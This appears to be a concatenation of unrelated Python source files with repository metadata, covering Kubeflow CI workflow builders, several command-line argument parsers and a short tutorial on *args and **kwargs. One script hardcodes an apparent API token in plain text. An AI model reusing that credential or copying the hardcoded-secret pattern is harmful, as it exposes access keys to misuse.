"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for testing notebook-server-jupyter-tensorflow OCI images"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template(mem_override="8Gi", deadline_override=6000)
# Test building notebook-server-jupyter-tensorflow images using Kaniko
dockerfile = ("%s/components/example-notebook-servers"
"/jupyter-tensorflow/cpu.Dockerfile") % self.src_dir
context = "dir://%s/components/example-notebook-servers/jupyter-tensorflow/" % self.src_dir
destination = "notebook-server-jupyter-tensorflow-cpu-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
dockerfile_cuda = ("%s/components/example-notebook-servers"
"/jupyter-tensorflow/cuda.Dockerfile") % self.src_dir
destination_cuda = "notebook-server-jupyter-tensorflow-cuda-test"
kaniko_task_cuda = self.create_kaniko_task(task_template, dockerfile_cuda,
context, destination_cuda, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task_cuda, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/notebook_servers/notebook_server_jupyter_tensorflow_tests.py",
"copies": "1",
"size": "2494",
"license": "apache-2.0",
"hash": 9086592361032856000,
"line_mean": 46.0566037736,
"line_max": 99,
"alpha_frac": 0.6110665597,
"autogenerated": false,
"ratio": 4.042139384116694,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5153205943816693,
"avg_score": null,
"num_lines": null
} |
""""Argo Workflow for testing notebook-server-rstudio-tidyverse OCI image"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template()
# Test building notebook-server-rstudio-tidyverse image using Kaniko
dockerfile = ("%s/components/example-notebook-servers"
"/rstudio-tidyverse/Dockerfile") % self.src_dir
context = "dir://%s/components/example-notebook-servers/rstudio-tidyverse/" % self.src_dir
destination = "notebook-server-rstudio-tidyverse-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/notebook_servers/notebook_server_rstudio_tidyverse_tests.py",
"copies": "1",
"size": "1846",
"license": "apache-2.0",
"hash": 7821207479933249000,
"line_mean": 41.9302325581,
"line_max": 98,
"alpha_frac": 0.6262188516,
"autogenerated": false,
"ratio": 4.01304347826087,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0005185146988890607,
"num_lines": 43
} |
""""Argo Workflow for testing the notebook-server-jupyter-pytorch OCI images"""
from kubeflow.kubeflow.ci import workflow_utils
from kubeflow.testing import argo_build_util
class Builder(workflow_utils.ArgoTestBuilder):
def __init__(self, name=None, namespace=None, bucket=None,
test_target_name=None, **kwargs):
super().__init__(name=name, namespace=namespace, bucket=bucket,
test_target_name=test_target_name, **kwargs)
def build(self):
"""Build the Argo workflow graph"""
workflow = self.build_init_workflow(exit_dag=False)
task_template = self.build_task_template(mem_override="8Gi")
# Test building notebook-server-jupyter-pytorch images using Kaniko
dockerfile = ("%s/components/example-notebook-servers"
"/jupyter-pytorch/cpu.Dockerfile") % self.src_dir
context = "dir://%s/components/example-notebook-servers/jupyter-pytorch/" % self.src_dir
destination = "notebook-server-jupyter-pytorch-cpu-test"
kaniko_task = self.create_kaniko_task(task_template, dockerfile,
context, destination, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task, [self.mkdir_task_name])
dockerfile_cuda = ("%s/components/example-notebook-servers"
"/jupyter-pytorch/cuda.Dockerfile") % self.src_dir
destination_cuda = "notebook-server-jupyter-pytorch-cuda-test"
kaniko_task_cuda = self.create_kaniko_task(task_template, dockerfile_cuda,
context, destination_cuda, no_push=True)
argo_build_util.add_task_to_dag(workflow,
workflow_utils.E2E_DAG_NAME,
kaniko_task_cuda, [self.mkdir_task_name])
# Set the labels on all templates
workflow = argo_build_util.set_task_template_labels(workflow)
return workflow
def create_workflow(name=None, namespace=None, bucket=None, **kwargs):
"""
Args:
name: Name to give to the workflow. This can also be used to name
things associated with the workflow.
"""
builder = Builder(name=name, namespace=namespace, bucket=bucket, **kwargs)
return builder.build()
| {
"repo_name": "kubeflow/kubeflow",
"path": "py/kubeflow/kubeflow/ci/notebook_servers/notebook_server_jupyter_pytorch_tests.py",
"copies": "1",
"size": "2453",
"license": "apache-2.0",
"hash": 7061610781880446000,
"line_mean": 45.2830188679,
"line_max": 96,
"alpha_frac": 0.60578883,
"autogenerated": false,
"ratio": 3.962843295638126,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0015742424699651237,
"num_lines": 53
} |
"""Argparse argument types and extensions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os, six, glob, itertools, argparse
_IMG_EXTS = ('.png', '.jpg', '.bmp', '.jpeg')
class ArgumentParser(argparse.ArgumentParser):
"""Extended argparse.ArgumentParser."""
def set_after_fn(self, after_fn):
def dec(fnc):
def new_fn(*args, **kwargs):
opts = fnc(*args, **kwargs)
return after_fn(self, opts)
return new_fn
self.parse_args = dec(self.parse_args)
def store_and(callable):
"""Stores value and call callable."""
class store_and_action(argparse.Action):
def __call__(self, *args, **kwargs):
callable.__call__(args[2])
setattr(args[1], self.dest, args[2])
return store_and_action
def _normalized_path(path):
"""Convert filepath to its normal form."""
return os.path.abspath(os.path.expanduser(path))
def _iendswith(string, suffix):
"""Check if string ends with suffix."""
return string.lower().endswith(suffix)
def _assert_non_empty(iterable):
"""Assert that next exists and fetch it."""
first_elem = six.next(iterable, None)
assert first_elem is not None, first_elem
return itertools.chain([first_elem], iterable)
def _assert_file_is_good(filename):
"""Assserts that file exists and is readable*."""
if not filename:
return
assert os.path.isfile(filename), filename
assert os.access(filename, os.R_OK), filename
assert os.access(filename, os.W_OK), filename
def _assert_dir_already_exists(dirname):
"""Assserts that dirname exists or create one."""
if not dirname:
return
assert os.path.isdir(dirname), dirname
assert os.access(dirname, os.R_OK), dirname
assert os.access(dirname, os.W_OK), dirname
def _assert_dir_exists(dirname):
"""Assserts that dirname exists or create one."""
if not dirname:
return
if not os.path.exists(dirname):
text = "directory %s doesn't exist, so creating"
print("\033[93m" + text % dirname + "\033[0m")
os.makedirs(dirname)
assert os.path.isdir(dirname), dirname
assert os.access(dirname, os.R_OK), dirname
assert os.access(dirname, os.W_OK), dirname
FLOAT_INF = float('inf')
class input_dir(str):
"""Argparse type for input dir options."""
is_path, is_dir = True, True
def __new__(cls, path):
npath = _normalized_path(path) + '/'
_assert_dir_already_exists(npath)
return str.__new__(cls, npath)
def __init__(self, path):
super(input_dir, self).__init__()
class input_file(str):
"""Argparse type for input file options."""
is_path, is_dir = True, False
def __new__(cls, path):
npath = _normalized_path(path)
_assert_file_is_good(npath)
return str.__new__(cls, npath)
def __init__(self, path):
super(input_file, self).__init__()
class output_dir(str):
"""Argparse type for output dir options."""
is_path, is_dir = True, True
def __new__(cls, path):
npath = _normalized_path(path) + '/'
_assert_dir_exists(npath)
return str.__new__(cls, npath)
def __init__(self, path):
super(output_dir, self).__init__()
class output_file(str):
"""Argparse type for output file options."""
is_path, is_dir = True, False
def __new__(cls, path):
npath = _normalized_path(path)
_assert_dir_exists(os.path.dirname(npath))
return str.__new__(cls, npath)
def __init__(self, path):
super(output_file, self).__init__()
def image_dir(ftype=".png"):
"""Image directory factory."""
class image_dir():
"""Argparse type for input image glob."""
is_path, is_dir = True, False
def __str__(self):
return self.path.__str__()
def __next__(self):
return six.next(self.imgs)
def next(self):
return six.next(self.imgs)
def __iter__(self):
return self
def __init__(self, path):
self.path = _normalized_path(path) + '/'
_assert_dir_already_exists(self.path)
self.imgs = glob.iglob(self.path + '*' + ftype)
self.imgs = _assert_non_empty(self.imgs)
return image_dir
class input_image(input_file):
"""Argparse type for image file options."""
def __new__(cls, path):
assert _iendswith(path, _IMG_EXTS), path
return input_file.__new__(cls, path)
class output_image(output_file):
"""Argparse type for image file options."""
def __new__(cls, path):
assert _iendswith(path, _IMG_EXTS), path
return output_file.__new__(cls, path)
def ranged_float(A, B=FLOAT_INF):
"""Ranged floats type factory."""
class ranged_float(float):
"""Float type in [A; B] range."""
def __init__(self, value):
assert A <= float(value) <= B, value
super(ranged_float, self).__init__()
return ranged_float
def multiple_of(factor):
"""Factory for x = k * factor, k in Z."""
class multiple_of(int):
"""Int type in [A; B] range."""
def __init__(self, k):
assert int(k) % factor == 0, (k, factor)
super(multiple_of, self).__init__()
return multiple_of
def ranged_int(A, B=FLOAT_INF):
"""Ranged floats type factory."""
class ranged_int(int):
"""Int type in [A; B] range."""
def __init__(self, value):
assert A <= int(value) <= B, value
super(ranged_int, self).__init__()
return ranged_int
| {
"repo_name": "Bellaktris/.files",
"path": "python/.local/lib/python/argparse_classes.py",
"copies": "1",
"size": "5753",
"license": "mit",
"hash": 7432103306581749000,
"line_mean": 24.0130434783,
"line_max": 59,
"alpha_frac": 0.5854336868,
"autogenerated": false,
"ratio": 3.6388361796331434,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9723752268089458,
"avg_score": 0.00010351966873706004,
"num_lines": 230
} |
"""argparse based argument parser for clang-hook"""
import abc
import sys
import argparse
from .auto_number import AutoNumber
class OptimisationLevel(AutoNumber):
"""Enumeration for -On option. Default is -O0."""
O0 = ()
O1 = ()
O2 = ()
O3 = ()
class OutputType(AutoNumber):
"""Enumeration for the output type of the given command."""
Obj = ()
Asm = ()
Elf = ()
def usage():
"""Pretty usage message <3"""
print(sys.argv[0]+"[clang options]")
class OAction(argparse.Action):
"""Handles -On option."""
def __call__(self, _parser, namespace, values, option_string=None):
opt = {
"0": OptimisationLevel.O0,
"1": OptimisationLevel.O1,
"2": OptimisationLevel.O2,
"3": OptimisationLevel.O3,
}[values]
setattr(namespace, self.dest, opt)
class AbstractFlagAction(argparse.Action, metaclass=abc.ABCMeta):
"""Handles options of the kind -Xfoo. It stores -Xfoo (and not just foo) to be easily given to the underlying
commands"""
def __init__(self, prefix, option_strings, dest, **kwargs):
self.prefix = prefix
super(AbstractFlagAction, self).__init__(option_strings, dest, **kwargs)
def __call__(self, _parser, namespace, values, option_string=None):
if self.dest in namespace:
old = getattr(namespace, self.dest)
else:
old = []
if old is None:
old = []
old.append(self.prefix + str(values))
setattr(namespace, self.dest, old)
class WAction(AbstractFlagAction):
"""Handles warning flags"""
def __init__(self, option_strings, dest, **kwargs):
super(WAction, self).__init__("-W", option_strings, dest, **kwargs)
class LAction(AbstractFlagAction):
"""Handles link flags"""
def __init__(self, option_strings, dest, **kwargs):
super(LAction, self).__init__("-l", option_strings, dest, **kwargs)
class DAction(AbstractFlagAction):
"""Handles define flags"""
def __init__(self, option_strings, dest, **kwargs):
super(DAction, self).__init__("-D", option_strings, dest, **kwargs)
class IAction(AbstractFlagAction):
"""Handles include flags"""
def __init__(self, option_strings, dest, **kwargs):
super(IAction, self).__init__("-I", option_strings, dest, **kwargs)
def init_hook_parser():
"""Builds and returns the argument parser."""
p = argparse.ArgumentParser(description='Hook for clang.')
p.add_argument("input_files", metavar="File", type=str, nargs='+', help="A file to compile")
p.add_argument('-D', metavar="flag", dest='defines', action=DAction, type=str, help="A define")
p.add_argument('-I', metavar="path", dest='includes', action=IAction, type=str, help="An include")
p.add_argument('-l', metavar="flag", dest='links', action=LAction, type=str, help="Enable a link flag")
p.add_argument('-W', metavar="flag", dest='warnings', action=WAction, type=str, help="Enable a warning")
p.add_argument('-w', dest='warnings', action='append_const', const="-w", help="Suppress all warnings")
p.add_argument('-std', dest='standard', action='store', help="Choose the standard")
p.add_argument('-o', metavar="path", dest='output_file', action='store', type=str, help="Output file")
p.add_argument('-c', metavar="path", dest='output_type', action='store_const', const=OutputType.Obj,
default=OutputType.Elf, help="To bytecode")
p.add_argument('-S', dest='output_type', action='store_const', const=OutputType.Asm,
default=OutputType.Elf, help="To assembly")
p.add_argument('-rdynamic', dest='links', action='append_const', const='-rdynamic', help="export dynamic")
p.add_argument('-O', metavar="level", dest='optimization_level', action=OAction, default=OptimisationLevel.O0,
help="Optimization level")
p.add_argument('--hook', metavar="flag", dest='hook', action='append', type=str,
help="Give a parameter to the hook. Must be repeted before each hook argument")
p.add_argument('--hook-config', metavar="path", dest='hook_config', action='store', type=str,
help="A path to the config. It will be look at first.")
p.add_argument('--version', action='version', version='%(prog)s 0.1')
return p
| {
"repo_name": "s-i-newton/clang-hook",
"path": "lib_hook/hook_parser.py",
"copies": "1",
"size": "4353",
"license": "apache-2.0",
"hash": -2426956755473027000,
"line_mean": 40.0660377358,
"line_max": 114,
"alpha_frac": 0.6287617735,
"autogenerated": false,
"ratio": 3.6889830508474577,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9809718473179299,
"avg_score": 0.0016052702336318448,
"num_lines": 106
} |
# argParser
# this class generates a RunParams object from the args passed to the script
from runparams import *
import os.path
import string
## handles args passed to the program
#
class ArgParser(object):
def parsePtCutString(self, ptCutString):
return map(float, string.split(ptCutString,',') )
def parseEventsString(self, eventsString):
return map(int, string.split(eventsString,',') )
def displayUserInfo(self):
print ""
print "o------------------o"
print "|Extracthistos Info|"
print "o------------------o"
print ""
print "[example usage]"
print ""
print "extracthistos inputFile.root"
print ""
print "extracthistos inputFile.root /intputDir/*.root --visualize --output outputfile-extracted.root --ptcuts 20,30,50,100 --etacut 2.5 --limit 100"
print ""
print "extracthistos inputFile.root /intputDir/*.root -v -o outputfile-extracted.root -p 20,30,50,100 -e 2.5 -l 100"
print ""
print "[switches]"
print " -d | --debug: Show debug information"
print " -e | --etacut: Set etaCut (double)"
print " -f | --force: Force overwriting of output file"
print " -i | --info: Shows this info"
print " -l | --limit: Limit maximum # of events processed"
print " -o | --output: Set output file (string)"
print " -od | --output-outputdirectory: Set output directory (string)"
print " -p | --ptcuts: Set pTcuts (list of doubles seperated by ',')"
print " -# | --events: Specify events to processed (list of ints seperated by ',')"
print " -m | --multi-processing: create n (int) subprocesses"
print " -% | --modulo: process only every nth event (int)"
print " -%r | --modulo-rest: process only every nth + r event (int)"
print " -v | --visualize: Create visualization(s)"
print " -vs | --visualize-skip-copies: Do not render non-physical particle copies"
print " -vnu | --visualize-no-underlying-event: Do not visualize the underlying event"
print " -vni | --visualize-no-main-interaction: Do not visualize the main interaction"
print " -vsj | --visualize-color-special-jets: Color special particle jets"
print " -vce | --visualize-cutoff-energy: Specify Visualization energy cutoff (double)"
print " -vcs | --visualize-cutoff-special-jets: Cutoff Special Jets"
print " -vcr | --visualize-cutoff-radiation: Cutoff ISR/FSR Jets"
print " -vme | --visualize-mode-energy: Color particles by their energy"
print " -vmp | --visualize-mode-pt: Color particles by their pT"
print " -vr | --visualize-renderer: Specify GraphViz renderer (string), defaults to 'dot'"
print ""
def __init__(self, args):
self.runParams = RunParams()
lenArgs = len(args)
skip = False
forceOutputOverride = False
for i in range (0, lenArgs):
# skip first arg as it's the script's name
if i == 0 or skip:
skip = False
continue
# provide arg and nextArg (if possible)
arg = args[i]
nextArg = None
if (i < lenArgs - 1):
nextArg = args[i+1]
# parse switches
if ( arg == "-d" ) or ( arg == "--debug" ) :
self.runParams.useDebugOutput = True
continue
if ( arg == "-e" ) or ( arg == "--etacut" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.eta = float(nextArg)
skip = True
continue
if ( arg == "-f" ) or ( arg == "--force" ) :
forceOutputOverride = True
continue
if ( arg == "-i" ) or ( arg == "--info" ) :
self.displayUserInfo()
self.runParams.run = False
break
if ( arg == "-l" ) or ( arg == "--limit" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.maxEvents = int(nextArg)
skip = True
continue
if ( arg == "-o" ) or ( arg == "--output" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
if nextArg [-15:] <> '-extracted.root':
raise Exception("'" + arg + "': Output file must end with '-extracted.root'!")
self.runParams.outputFile = nextArg
skip = True
continue
if ( arg == "-p" ) or ( arg == "--ptcuts" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
ptCutString = nextArg
self.runParams.pTCuts = self.parsePtCutString(ptCutString)
skip = True
continue
if ( arg == "-v" ) or ( arg == "--visualize" ) :
self.runParams.useVisualization = True
continue
if ( arg == "-vs" ) or ( arg == "--visualize-skip-copies" ) :
self.runParams.visualizationSkipCopies = True
continue
if ( arg == "-vnu" ) or ( arg == "--visualize-no-underlying-event" ) :
self.runParams.visualizationShowUnderlyingEvent = False
continue
if ( arg == "-vni" ) or ( arg == "--visualize-no-main-interaction" ) :
self.runParams.visualizationShowMainInteraction = False
continue
if ( arg == "-vsj" ) or ( arg == "--visualize-color-special-jets" ) :
self.runParams.visualizationColorSpecialJets = True
continue
if ( arg == "-vme" ) or ( arg == "--visualize-mode-energy" ) :
self.runParams.visualizationEnergyMode = True
continue
if ( arg == "-vmp" ) or ( arg == "--visualize-mode-pt" ) :
self.runParams.visualizationPtMode = True
continue
if ( arg == "-vce" ) or ( arg == "--visualize-cutoff-energy" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.visualizationEnergyCutoff = int(nextArg)
skip = True
continue
if ( arg == "-vcr" ) or ( arg == "--visualize-cutoff-radiation" ) :
self.runParams.visualizationCutoffRadiation = True
continue
if ( arg == "-vcs" ) or ( arg == "--visualize-cutoff-special-jets" ) :
self.runParams.visualizationCutSpecialJets = True
continue
#if ( arg == "-vp" ) or ( arg == "--visualize-pt-cutoff" ) :
#if nextArg is None or nextArg[0] == '-':
#raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
#self.runParams.visualizationPtCutoff = int(nextArg)
#skip = True
#continue
if ( arg == "-vr" ) or ( arg == "--visualize-renderer:" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.visualizationRenderer = nextArg
skip = True
continue
#if ( arg == "-z" ) or ( arg == "--zero-jets" ) :
#self.runParams.zeroAdditionalJets = True
#continue
if ( arg == "-#" ) or ( arg == "--events" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
eventsString = nextArg
self.runParams.events = self.parseEventsString(eventsString)
skip = True
continue
if ( arg == "-od" ) or ( arg == "--output-outputdirectory" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.outputDir = nextArg
skip = True
continue
if ( arg == "-m" ) or ( arg == "--multi-processing" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.multiProcessing = int(nextArg)
skip = True
continue
if ( arg == "-%" ) or ( arg == "--modulo" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.modulo = int(nextArg)
skip = True
continue
if ( arg == "-%r" ) or ( arg == "--modulo-rest" ) :
if nextArg is None or nextArg[0] == '-':
raise Exception("'" + arg + "': Parse Error after '"+arg+"'!")
self.runParams.moduloRest = int(nextArg)
skip = True
continue
if (arg[0] == '-'):
raise Exception("'" + arg + "' is not a valid switch!")
# deny input files ending with '-extracted.root', as this is our signature for output files:
if arg[-15:] == '-extracted.root':
print "Warning: File '" + arg + "' is being skipped."
continue
# parse input files:
if arg[-5:] == '.root':
thisFile = arg
if thisFile[:7] == "/store/":
if not os.path.isfile(thisFile):
thisFile = "root://xrootd.ba.infn.it/" + thisFile
else:
if not os.path.isfile(thisFile):
raise Exception("File '" + thisFile + "' does not exist!")
self.runParams.inputFileList.append(thisFile)
continue
raise Exception("'" + arg + "' is not a valid root file!")
if self.runParams.useVisualization and len(self.runParams.inputFileList) > 1:
raise Exception("Visualization is allowed only for exactly one input file.")
if self.runParams.run:
if os.path.isfile(self.runParams.outputFile) and not forceOutputOverride:
raise Exception("'" + self.runParams.outputFile + "' exists. Use the --force switch to force overriding.")
if len(self.runParams.outputDir) <> 0:
if not os.path.exists(self.runParams.outputDir):
os.makedirs(self.runParams.outputDir)
self.runParams.outputFilePath = self.runParams.outputDir + "/" + self.runParams.outputFile
else:
self.runParams.outputFilePath = self.runParams.outputFile
#self.displayInfo()
| {
"repo_name": "mharrend/plotscripts",
"path": "argparser.py",
"copies": "2",
"size": "9893",
"license": "mit",
"hash": 7057918201830962000,
"line_mean": 38.8911290323,
"line_max": 153,
"alpha_frac": 0.5741433337,
"autogenerated": false,
"ratio": 3.4651488616462345,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5039292195346234,
"avg_score": null,
"num_lines": null
} |
"""argParser.py:
Parses arguments from a command line.
Requires four arguments: argv,required_arg,required_arg_type,optional_arg
argv is a direct pass of sys.argv
required_arg (list) arguments required for calling script execution.
FINISH ME!
"""
#*****************************************************************************#
# INITALIZE MODULE #
#*****************************************************************************#
__author__ = "Michael J. Harms"
__version__ = "0.1"
__date__ = "1/13/06"
from optparse import OptionParser
import sys
import os
import copy
# SEE BOTTOM OF SCRIPT TO DEFINE OPTIONS THAT THE SCRIPT "KNOWS" HOW TO PARSE
#*****************************************************************************#
# FUNCTION DEFINITIONS #
#*****************************************************************************#
def addDielectric(default_dielectric=20):
"""Add dielectric constant to list of possible arguments."""
parser.add_option("-D","--dielectric",action="store",type="float",
dest="dielectric",
help="Dielectric constant for UHBD calculations (default=20)",
default=default_dielectric)
def addIonicStrength(default_ionic_strength=0.1):
"""Add ionic strength to list of possible arguments."""
parser.add_option("-I","--ionic-strength",action="store",type="float",
dest="ionic_strength",
help="Ionic strength for UHBD calculations (default=0.1 M)",
default=default_ionic_strength)
def addPHTitration(default_pH_titration=(0,16,0.25)):
"""Add pH titration to list of possible arguments."""
parser.add_option("-P","--pH-titration",action="store",type="float",
dest="pHtitr",nargs=3,
help="pH titration for UHBD calculations. PHTITR is a \
set of three values PH_START PH_STOP PH_INTERVAL. \
(Default 0 16 0.25)",
default=default_pH_titration)
def grabRequiredArgs(passed_required_arg,required_arg,required_arg_type):
"""Checks validity of required arguments (i.e. inputfile and output_dir).
Arguments:
passed_required_args (list) set of arguments on the command line
that are not a part of an "option"
required_arg (list) list of string identifiers for required
arguments.
required_arg_type (list) list of strings that identify argument
types. Types are'inpfile', 'outfile',
or 'outdir', telling script whether to
check for file existance, create new
file, or create a new output directory.
Returns:
required_arg_values (dict) Dictionary of required_arg identifiers
and command line values.
"""
# Check for correct number of arguments
if len(passed_required_arg) - 1 < len(required_arg):
print "Missing arguments(s)"
print "Try --help for options."
sys.exit(1)
# Pull command line values and place in dictionary with correct argument
# identifier
required_arg_values = {}
for i in range(0,len(required_arg)):
required_arg_values.update([(required_arg[i],passed_required_arg[i+1])])
# Do a few sanity checks on required arguments (using required_arg_type)
for index, arg in enumerate(required_arg):
# Check for input file existance
if required_arg_type[index] == 'inpfile':
try:
open(required_arg_values[arg],'r')
except IOError:
print "File '" + required_arg_values[arg] + "' not readable!"
sys.exit(2)
# Prompt before overwriting output files
if required_arg_type[index] == 'outfile':
try:
open(required_arg_values[arg],'r')
except IOError:
continue
decision = raw_input("Warning! File '" + required_arg_values[arg] \
+ "' already exists! overwrite (y/n)? ")
if decision[0] == 'Y' or decision[1] == 'y':
os.remove(required_arg_values[arg])
else:
sys.exit()
# Check for directory existance
if required_arg_type[index] == 'outdir':
try:
os.listdir(required_arg_values[arg])
except OSError:
decision = raw_input("Directory '" + required_arg_values[arg] + \
"' does not exist. Create it (y/n)? ")
if decision[0] == 'Y' or decision[0] == 'y':
os.mkdir(required_arg_values[arg])
else:
sys.exit()
# If there are any more arguments on the command line, report them and
# ignore them.
if len(passed_required_arg) - 1 > len(required_arg):
print "Trailing arguments (not evaluated):"
for trailer in passed_required_arg[len(required_arg):]:
print trailer
return required_arg_values
def main(argv,required_arg,required_arg_type,optional_arg):
"""Takes a command line (passed from other module) and parse options (also
passed) and returns proper values (either specified by user or default.
"""
# add optional_arguments to the parser
for option in optional_arg:
parse_option_dictionary[option]()
# parse the command line
passed_optional_arg, passed_required_arg = parser.parse_args(argv)
required_arg_values = grabRequiredArgs(passed_required_arg,required_arg,
required_arg_type)
return required_arg_values, passed_optional_arg
#*****************************************************************************#
# DEFINE OPTIONS SCRIPT IS ABLE TO PARSE #
#*****************************************************************************#
global parser
parser = OptionParser()
parse_option_dictionary = {"ionic_strength":addIonicStrength,
"dielectric":addDielectric,
"pHtitr":addPHTitration}
# REMOVE THIS, WON'T BE USED IN PRODUCTION!
if __name__ == "__main__":
print main(sys.argv,["file1","file2"],["inpfile","outdir"],["ionic_strength","dielectric","pHtitr"])
| {
"repo_name": "harmsm/uhbd",
"path": "previous_releases/0.4.0/argParser.py",
"copies": "1",
"size": "6755",
"license": "unlicense",
"hash": -5768802788341243000,
"line_mean": 40.4417177914,
"line_max": 104,
"alpha_frac": 0.518430792,
"autogenerated": false,
"ratio": 4.476474486414844,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.024270803664210527,
"num_lines": 163
} |
# argparse tells script user if they have supplied the right values
import argparse
import requests #http for humans
def main():
parser = argparse.ArgumentParser()
# Checks if the arguments needed for the script are supplied.
parser.add_argument("event_oid", help="example: 'Ce6TKMojss' ")
parser.add_argument("env", default='staging')
# dev, qa, staging, production
args = parser.parse_args()
if args.env:
print "env turned on"
# Thanks user for using the help tool correctly.
print "Thanks for the 2 pieces of info: \n {}".format(args.event_oid)
api_key = '392c0d3bc5ed87aaf56eb6c9f3d63bd7'
# combines user supplied info to url
url = 'https://eventcenter.crowdcompass.com/internal/v3/build/apps/%s' % (args.event_oid)
#tells that json is the type of file type desired
headers = {}
headers['Content-Type'] = 'application/json'
headers['Accept'] = 'application/json'
params = {}
params['api_token'] = '392c0d3bc5ed87aaf56eb6c9f3d63bd7'
# make the request
req = requests.get(url, headers=headers, params=params)
# print the results of the request
print req
if __name__ == '__main__':
main()
| {
"repo_name": "talapus/Ophidian",
"path": "CC/requesting_json_content_with_appoid.py",
"copies": "1",
"size": "1208",
"license": "bsd-3-clause",
"hash": 4336362092733477400,
"line_mean": 26.4545454545,
"line_max": 93,
"alpha_frac": 0.6713576159,
"autogenerated": false,
"ratio": 3.4613180515759314,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9496264254640864,
"avg_score": 0.027282282567013483,
"num_lines": 44
} |
# *args & **kwargs
# https://freepythontips.wordpress.com/2013/08/04/args-and-kwargs-in-python-explained/
# Python has some great flexibility in calling functions with an assortment of arguments. Most
# functions you write have a set of arguments that you need and you have to place them in a specific
# order.
def fn_one(arg1, arg2, arg3):
print arg1
print arg2
print arg3
print "Calling fn_one()"
fn_one(1, 2, 3)
# Calling "fn_one" with all of the arguments means you need to pass them one at a time in the right
# order. "*args" allows you to include an additional list of unknown length to the function, which
# by convention should come after your "formal arguments" or explicitly named ones.
def fn_two(arg1, arg2, *args):
print arg1
print arg2
for arg in args:
print arg
print "\n"
print "Calling fn_two()"
fn_two(1, 2, 3, 4, 5, 6)
# We can iterate through the list of *args like any other list! Optionally, **kwargs let you key
# specific values without needing them to be defined in the formal arguments list:
def fn_three(arg1, *args, **kwargs):
print arg1
for arg in args:
print arg
for key, value in kwargs.iteritems():
print key, value
print "\n"
print "Calling fn_three()"
fn_three(1, 2, 3, 4, five=5, six=6, seven=7)
# PyCharm Debugging
# PyCharm let's us do some interactive debugging within our local environment. We can have the server
# that normally runs the Python from the vagrant box to instead be served through PyCharm.
# Add the following configuration to your PyCharm configurations:
# Fill in all of the ___ with the path to your local repository
# Script = ___/mm2/server.py
# Environment variables = PYTHONUNBUFFERED=1 | {
"repo_name": "mysidewalk/training-django",
"path": "01-middling-python/04-debugging/debugging.py",
"copies": "1",
"size": "1719",
"license": "mit",
"hash": 668452319214059300,
"line_mean": 32.7254901961,
"line_max": 101,
"alpha_frac": 0.7178592205,
"autogenerated": false,
